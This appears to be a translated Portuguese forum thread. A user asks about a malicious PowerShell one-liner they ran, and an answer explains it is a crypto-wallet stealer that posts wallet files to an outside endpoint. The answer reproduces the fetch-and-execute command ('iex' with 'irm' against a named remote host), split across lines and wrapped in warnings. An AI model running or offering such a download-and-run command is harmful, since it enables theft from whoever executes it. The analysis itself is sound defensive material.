Eu era um idiota e fui levado a executar um script do PowerShell. Quais são os detalhes sobre isso? Tenho a sensação de que eles carregaram apenas alguns arquivos do meu sistema.
Mas estou preocupado que possa haver um backdoor em execução no meu sistema. O upload eu posso viver, mas não um backdoor.
Aviso! Não execute este script.
iex "& { $(irm
(Eu separei isso em duas linhas para evitar a execução não intencional)
powershell.software/versioncheck) } RunJob"
Aviso! Não execute este script.
AVISO: NÃO EXECUTE NENHUM DO CÓDIGO NESTA RESPOSTA. É MALICIOSO E SÓ FOI INCLUÍDO PARA FINS DEMONSTRATÓRIOS.
powershell.software/versioncheck
é um link maliciosoA página para a qual ele leva é a seguinte:
Quando você tenta visitar este link em um navegador, ele rapidamente o redireciona para fora dessa página, para outra página fingindo (mal) que o site não existe:
Quando executado no comando completo que você forneceu, no entanto, ele reconhece as seguintes linhas como comandos do PowerShell:
É um ladrão de carteiras de criptomoedas primitivo. Cada linha que começa com
Invoke-RestMethod
tentativas de enviar dados de outras carteiras de criptomoedas possíveis (se você tiver alguma instalada em seu computador) para uma página no endpointhttp://extract.onl
.Se você tiver carteiras de criptomoedas no computador, elas provavelmente estão comprometidas. Transfira qualquer coisa neles para outra carteira SEGURA.
Resumindo suas preocupações:
Sim, se esses arquivos existiam no seu computador, eles foram carregados. No entanto, isso é tudo o que esse script parece fazer, portanto, não há backdoor persistente em seu sistema.
Editar 25/10/2021:Desde a redação desta resposta, o acesso ao código malicioso empowershell.software/versioncheck
agora é impedido (e agora produz um erro 403), mas pode voltar a qualquer momento. Ainda é um risco.Editar 24/01/2022:
O proprietário de
powershell.software/versioncheck
colocou o código malicioso novamente online. Isso ainda é um risco.